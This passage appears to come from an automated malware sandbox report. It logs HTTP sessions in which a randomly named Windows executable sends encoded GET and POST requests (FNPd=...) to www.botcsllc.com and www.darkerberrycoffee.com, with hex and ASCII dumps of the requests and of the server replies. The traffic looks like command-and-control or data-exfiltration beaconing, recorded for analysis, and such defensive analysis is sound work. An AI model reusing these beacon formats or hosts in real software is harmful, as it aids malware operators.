                                  Data Raw: 46 4e 50 64 3d 37 68 55 61 76 4a 45 52 32 76 57 2b 72 42 41 76 53 79 72 51 52 77 53 57 4a 72 6f 75 30 54 77 4e 38 71 51 4b 37 79 5a 51 30 64 68 77 5a 38 78 77 63 61 61 4a 39 45 73 34 4f 41 2b 78 57 50 57 4d 41 32 66 44 4f 4b 56 35 7a 6b 58 6f 67 4b 4e 6e 73 48 69 6a 78 4a 6d 49 47 52 50 41 62 38 32 4c 32 33 75 38 53 43 75 6a 6e 48 48 33 70 4d 54 79 6e 7a 62 30 56 6e 7a 66 76 36 2b 58 6f 39 44 56 4c 32 53 70 38 51 75 4a 50 42 67 6e 30 54 79 7a 64 72 51 44 46 4a 48 65 62 4d 36 6d 42 5a 6a 43 75 34 51 31 4d 67 6d 6d 6a 51 2f 67 4f 36 72 36 56 48 51 4f 4f 42 57 37 4c 6e 66 62 57 6c 75 48 61 46 5a 31 79 4b 33 77 62 65 32 6e 58 36 4f 53 79 66 4c 74 46 63 56 43 65 72 68 6e 51 39 6c 59 6f 4e 48 68 44 78 7a 33 79 2f 48 6c 69 52 34 4d 77 48 54 37 52 65 6c 68 44 76 71 38 62 62 34 74 2b 6d 52 38 37 32 46 54 4d 56 31 70 58 5a 32 64 7a 71 38 65 32 39 6a 75 7a 4f 66 61 4f 71 63 78 39 46 79 66 66 47 7a 66 58 43 79 36 6b 6e 62 46 5a 6b 56 38 6b 31 58 55 52 38 68 62 44 56 45 79 61 34 62 73 33 43 32 64 76 31 39 4e 65 [TRUNCATED]
                                  Data Ascii: FNPd=7hUavJER2vW+rBAvSyrQRwSWJrou0TwN8qQK7yZQ0dhwZ8xwcaaJ9Es4OA+xWPWMA2fDOKV5zkXogKNnsHijxJmIGRPAb82L23u8SCujnHH3pMTynzb0Vnzfv6+Xo9DVL2Sp8QuJPBgn0TyzdrQDFJHebM6mBZjCu4Q1MgmmjQ/gO6r6VHQOOBW7LnfbWluHaFZ1yK3wbe2nX6OSyfLtFcVCerhnQ9lYoNHhDxz3y/HliR4MwHT7RelhDvq8bb4t+mR872FTMV1pXZ2dzq8e29juzOfaOqcx9FyffGzfXCy6knbFZkV8k1XUR8hbDVEya4bs3C2dv19NeDO6ZwdQkn7FG469j5TuF6Y1rXARXfK6DMPU/PAjZXr4MfXg2MbDiajAkFjytzOeUg8Jf/uyLVgPG98ArebHzeiUjBIDQK0y+bkt/L0L0D0jxvwnnV1TlLkHEwAsSpk5l42NueQHrbQbSNL4nDqsYTIQOSBFH7daR7YJsQfOtiyA0Jw7huce7cv3l8qG0WK6enRCRuPfG1gGBhMv516CrueBYPvIW0hGcPMnTZ+zxoYtBvO4bn101BrjBXBL/ZQxO7glBHuE85BixD2W1WkfcnBI6vJQvsR495LZmlivc+sUplKNPG0VSwRVfGGLkQn1tZT6SqUntA4vHAOFmDFlFoEVmog5+e0geWOYrB/A6ssTRXlBY9AWOf4DoC6uhfPjA1RCPczhJp+MzE8VfKIdwEG4u/0qD9yq0PHfWg/UsTr5dRsPkU0vyJteoxyowmv3ro0qlYxEicnhbVYS0hUMyS08eC+fxztmfr024544dgGrj73ZgKBdpzkrki6pSpaAF9rAhrLQKKRReOp98UtyS6zC3fJp9SZHW8pGpoXcSjGbwmEPgVUvSga1AzMsEzGZH32w05j6Lt2eym6pa1k+35e4STKWNRnZ/flbwW9q0Fu8ayXMLiNhWrkO+aB2NmutLsyhMicTz9Bq6Euosfe8DRXVZjGn/dDmlzZ [TRUNCATED]
                                  May 23, 2024 15:19:25.218638897 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                  content-type: text/html; charset=UTF-8
                                  x-request-id: 4b985045-4e35-4cf0-bbf2-5ba0b279109b
                                  x-runtime: 0.023026
                                  content-length: 19281
                                  connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                  May 23, 2024 15:19:25.220802069 CEST | 1236 | IN | Data Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                  Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                  May 23, 2024 15:19:25.225644112 CEST | 1236 | IN | Data Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                  Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                  May 23, 2024 15:19:25.225657940 CEST | 1236 | IN | Data Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20
                                  Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                  May 23, 2024 15:19:25.235279083 CEST | 1236 | IN | Data Raw: 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74 69 6f 6e 73 2e 72 62 3a 33 33 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65
                                  Data Ascii: ion_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" h
                                  May 23, 2024 15:19:25.240149021 CEST | 1236 | IN | Data Raw: 5f 69 64 2e 72 62 3a 32 37 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 31 22 20 68 72 65 66 3d 22 23 22
                                  Data Ascii: _id.rb:27:in `call&#39;</a><br><a class="trace-frames" data-frame-id="11" href="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `cal
                                  May 23, 2024 15:19:25.240164042 CEST | 1236 | IN | Data Raw: 32 3a 69 6e 20 60 70 72 6f 63 65 73 73 5f 63 6c 69 65 6e 74 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 32 31 22 20 68 72 65 66 3d 22
                                  Data Ascii: 2:in `process_client&#39;</a><br><a class="trace-frames" data-frame-id="21" href="#">puma (4.3.9) lib/puma/server.rb:328:in `block in run&#39;</a><br><a class="trace-frames" data-frame-id="22" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:
                                  May 23, 2024 15:19:25.249802113 CEST | 1236 | IN | Data Raw: 69 64 3d 22 36 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 76 65 73 75 70 70 6f 72 74 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 76 65 5f 73 75 70 70 6f 72 74 2f 74 61 67 67 65 64 5f 6c 6f 67 67 69 6e 67 2e 72 62 3a 37 31 3a 69 6e 20 60
                                  Data Ascii: id="6" href="#">activesupport (5.2.6) lib/active_support/tagged_logging.rb:71:in `tagged&#39;</a><br><a class="trace-frames" data-frame-id="7" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `call&#39;</a><br><a class="trace-frames" d
                                  May 23, 2024 15:19:25.249818087 CEST | 1236 | IN | Data Raw: 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 74 61 74 69 63 2e 72 62 3a 31 32 37 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65
                                  Data Ascii: h/middleware/static.rb:127:in `call&#39;</a><br><a class="trace-frames" data-frame-id="16" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#39;</a><br><a class="trace-frames" data-frame-id="17" href="#">railties (5.2.6) lib/rails/engin
                                  May 23, 2024 15:19:25.255414963 CEST | 1236 | IN | Data Raw: 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 74 61 72 67 65 74 20 3d 20 65 2e 74 61 72 67 65 74 3b 0a 20 20 20 20 20 20 20 20 76 61
                                  Data Ascii: unction(e) { e.preventDefault(); var target = e.target; var frame_id = target.dataset.frameId; if (selectedFrame) { selectedFrame.className = selectedFrame.className.replace("selected", ""); }
                                  May 23, 2024 15:19:25.255428076 CEST | 672 | IN | Data Raw: 20 61 62 73 6f 6c 75 74 65 20 55 52 4c 20 28 77 69 74 68 20 74 68 65 20 68 74 74 70 20 61 6e 64 20 64 6f 6d 61 69 6e 29 22 20 68 72 65 66 3d 22 23 22 3e 55 72 6c 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 2f 74 68 3e 0a 20 20 20 20 20 20 3c 74 68 3e 0a
                                  Data Ascii: absolute URL (with the http and domain)" href="#">Url</a> </th> <th> </th> <th> <input id="search" placeholder="Path Match" type="search" name="path[]" /> </th> <th> </th> </tr> </thead>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  8 | 192.168.2.6 | 49714 | 216.40.34.41 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 23, 2024 15:19:27.226608992 CEST | 491 | OUT | GET /qukz/?FNPd=2j86s8NJ5fDu8DdyaluKTyyQGpxO5RQn4ZQP4QlLq4dDbMhIcvPH81QwZFWQYfauPSKzeNxy1T+ygqRogiCCubiSHCzeY+ai+VGnS0fEikTej8/T0yfRDQzRtbWcxq7BJieL0EY=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.botcsllc.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:19:27.726614952 CEST | 1236 | IN | HTTP/1.1 200 OK
                                  x-frame-options: SAMEORIGIN
                                  x-xss-protection: 1; mode=block
                                  x-content-type-options: nosniff
                                  x-download-options: noopen
                                  x-permitted-cross-domain-policies: none
                                  referrer-policy: strict-origin-when-cross-origin
                                  content-type: text/html; charset=utf-8
                                  etag: W/"716ddccefe706082230daa01e9261cc7"
                                  cache-control: max-age=0, private, must-revalidate
                                  x-request-id: fb0c1d02-9dd2-463c-b18c-b447328df50d
                                  x-runtime: 0.004365
                                  transfer-encoding: chunked
                                  connection: close
                                  Data Raw: 31 34 42 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 [TRUNCATED]
                                  Data Ascii: 14B1<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>botcsllc.com is expired</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=expired">
                                  May 23, 2024 15:19:27.728070974 CEST | 1236 | IN | Data Raw: 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61 2d 36 61 32 62 61 38 33 35 30 39 30 37 64 34 61 31 37 62 66 63 37 38 36 33 63
                                  Data Ascii: <img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>botcsllc.com</h1><h2>has expired.</h2><div class='cta'><a class='btn' href='https://w
                                  May 23, 2024 15:19:27.731059074 CEST | 1236 | IN | Data Raw: 65 78 70 69 72 65 64 22 3e 44 6f 6d 61 69 6e 20 50 72 69 63 69 6e 67 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 76 65 72 2e 63 6f 6d
                                  Data Ascii: expired">Domain Pricing</a></li><li><a rel="nofollow" href="https://www.hover.com/email?source=expired">Email</a></li><li><a rel="nofollow" href="https://www.hover.com/about?source=expired">About Us</a></li><li><a rel="nofollow" href="https
                                  May 23, 2024 15:19:27.734087944 CEST | 1236 | IN | Data Raw: 2d 31 39 2e 34 36 36 37 35 20 2d 36 2e 37 39 39 33 34 2c 34 2e 30 33 32 39 35 20 2d 31 34 2e 33 32 39 33 2c 36 2e 39 36 30 35 35 20 2d 32 32 2e 33 34 34 36 31 2c 38 2e 35 33 38 34 31 20 2d 36 2e 34 31 37 37 35 2c 2d 36 2e 38 33 38 37 39 20 2d 31
                                  Data Ascii: -19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47
                                  May 23, 2024 15:19:27.737076044 CEST | 1236 | IN | Data Raw: 2d 37 35 20 31 38 31 74 2d 31 38 31 20 37 35 74 2d 31 38 31 20 2d 37 35 74 2d 37 35 20 2d 31 38 31 74 37 35 20 2d 31 38 31 74 31 38 31 20 2d 37 35 74 31 38 31 20 37 35 74 37 35 20 31 38 31 7a 4d 31 31 36 32 20 36 34 30 71 30 20 2d 31 36 34 20 2d
                                  Data Ascii: -75 181t-181 75t-181 -75t-75 -181t75 -181t181 -75t181 75t75 181zM1162 640q0 -164 -115 -279t-279 -115t-279 115t-115 279t115 279t279 115t279 -115t115 -279zM1270 1050q0 -38 -27 -65t-65 -27t-65 27t-27 65t27 65t65 27t65 -27t27 -65zM768 1270 q-7 0 -
                                  May 23, 2024 15:19:27.737088919 CEST | 437 | IN | Data Raw: 65 72 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 28 66 75 6e 63 74 69 6f 6e 28 69 2c 73 2c 6f 2c 67 2c 72 2c 61 2c 6d 29 7b 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 3d 72 3b 69 5b 72 5d 3d 69 5b 72 5d 7c 7c 66 75
                                  Data Ascii: er><script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insert


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  9 | 192.168.2.6 | 49715 | 3.33.130.190 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 23, 2024 15:19:32.772777081 CEST | 769 | OUT | POST /q801/ HTTP/1.1
                                  Host: www.darkerberrycoffee.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.darkerberrycoffee.com
                                  Referer: http://www.darkerberrycoffee.com/q801/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 70 31 57 69 38 7a 7a 30 37 31 4f 4c 52 39 32 38 6f 5a 78 66 49 78 70 68 4c 50 76 61 4c 6c 76 6b 52 38 47 33 4d 41 30 6a 46 50 4a 45 75 64 4c 75 53 57 4e 53 45 49 61 53 6f 33 71 38 30 44 45 4e 7a 49 52 55 46 79 6c 76 79 4a 51 52 42 44 69 42 62 45 71 31 4d 65 7a 76 43 4d 7a 52 46 72 58 4b 74 4b 59 6b 4a 6e 45 6f 76 6b 6d 65 52 76 4a 4d 69 69 66 55 63 62 4e 66 32 59 4d 48 66 69 52 45 55 67 5a 38 67 50 63 42 4e 6a 2b 45 6c 2b 64 35 38 70 62 63 31 44 4c 70 55 78 34 77 6f 65 44 30 67 2b 2f 54 41 68 37 65 35 6f 35 35 4b 43 64 7a 79 45 64 54 75 59 41 68 48 75 42 32 6c 76 55 4f 68 4a 7a 58 64 51 6c 41 4b 47 75 51
                                  Data Ascii: FNPd=p1Wi8zz071OLR928oZxfIxphLPvaLlvkR8G3MA0jFPJEudLuSWNSEIaSo3q80DENzIRUFylvyJQRBDiBbEq1MezvCMzRFrXKtKYkJnEovkmeRvJMiifUcbNf2YMHfiREUgZ8gPcBNj+El+d58pbc1DLpUx4woeD0g+/TAh7e5o55KCdzyEdTuYAhHuB2lvUOhJzXdQlAKGuQ


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  10 | 192.168.2.6 | 49716 | 3.33.130.190 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 23, 2024 15:19:35.307781935 CEST | 793 | OUT | POST /q801/ HTTP/1.1
                                  Host: www.darkerberrycoffee.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.darkerberrycoffee.com
                                  Referer: http://www.darkerberrycoffee.com/q801/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 70 31 57 69 38 7a 7a 30 37 31 4f 4c 54 65 75 38 37 36 4a 66 50 52 70 2b 48 76 76 61 46 46 75 74 52 38 4b 33 4d 42 77 4a 47 39 74 45 74 39 62 75 54 55 31 53 48 49 61 53 6a 58 71 35 77 44 46 42 7a 50 59 68 46 7a 5a 76 79 4e 34 52 42 47 47 42 4f 6e 53 32 50 75 7a 70 62 63 7a 58 59 62 58 4b 74 4b 59 6b 4a 6e 68 2f 76 6b 4f 65 53 65 35 4d 74 6a 66 56 44 72 4e 63 2f 34 4d 48 53 43 52 36 55 67 59 5a 67 4b 31 63 4e 68 57 45 6c 36 5a 35 39 34 62 64 38 44 4c 7a 5a 52 35 2b 67 73 32 5a 67 38 71 52 47 43 61 38 67 61 78 6e 47 55 63 70 75 33 64 77 38 49 67 6a 48 73 5a 45 6c 50 55 6b 6a 4a 4c 58 50 48 70 6e 46 79 4c 7a 61 64 4b 48 56 6a 57 79 35 64 46 4b 61 57 56 43 4a 61 2f 68 75 51 3d 3d
                                  Data Ascii: FNPd=p1Wi8zz071OLTeu876JfPRp+HvvaFFutR8K3MBwJG9tEt9buTU1SHIaSjXq5wDFBzPYhFzZvyN4RBGGBOnS2PuzpbczXYbXKtKYkJnh/vkOeSe5MtjfVDrNc/4MHSCR6UgYZgK1cNhWEl6Z594bd8DLzZR5+gs2Zg8qRGCa8gaxnGUcpu3dw8IgjHsZElPUkjJLXPHpnFyLzadKHVjWy5dFKaWVCJa/huQ==


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  11 | 192.168.2.6 | 49717 | 3.33.130.190 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 23, 2024 15:19:37.840804100 CEST | 1806 | OUT | POST /q801/ HTTP/1.1
                                  Host: www.darkerberrycoffee.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.darkerberrycoffee.com
                                  Referer: http://www.darkerberrycoffee.com/q801/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 70 31 57 69 38 7a 7a 30 37 31 4f 4c 54 65 75 38 37 36 4a 66 50 52 70 2b 48 76 76 61 46 46 75 74 52 38 4b 33 4d 42 77 4a 47 39 6c 45 75 4c 58 75 54 31 31 53 47 49 61 53 75 33 71 34 77 44 46 4d 7a 4f 39 70 46 7a 56 56 79 50 41 52 41 6c 2b 42 66 32 53 32 55 65 7a 70 47 4d 7a 57 46 72 58 66 74 4f 38 67 4a 6e 52 2f 76 6b 4f 65 53 63 78 4d 71 79 66 56 46 72 4e 66 32 59 4d 54 66 69 52 42 55 67 67 6a 67 4b 35 4d 4e 77 32 45 6b 61 4a 35 36 4b 7a 64 7a 44 4c 31 61 52 34 6a 67 73 71 61 67 38 6d 72 47 44 2f 70 67 61 46 6e 45 42 6c 69 31 6c 5a 63 39 4f 30 58 45 37 70 5a 69 66 64 61 6f 4c 48 50 4d 6c 31 39 63 67 58 47 44 72 53 75 64 41 37 6b 34 4c 70 65 51 68 4a 57 43 36 79 7a 30 32 6e 66 6e 37 47 73 71 31 5a 64 53 4a 75 78 35 46 42 42 6d 56 6a 70 2b 34 5a 6c 37 2f 63 59 4a 4e 5a 4d 33 4b 64 46 41 7a 35 5a 33 59 52 59 72 45 2b 6b 2b 61 43 54 31 37 34 63 33 2b 4d 65 39 51 57 32 58 78 61 4f 52 64 4d 6b 55 66 48 4b 33 6b 72 79 6f 67 4f 76 6e 55 64 67 4d 48 56 4e 73 42 7a 38 44 6d 36 65 51 49 74 4e 69 [TRUNCATED]
                                  Data Ascii: 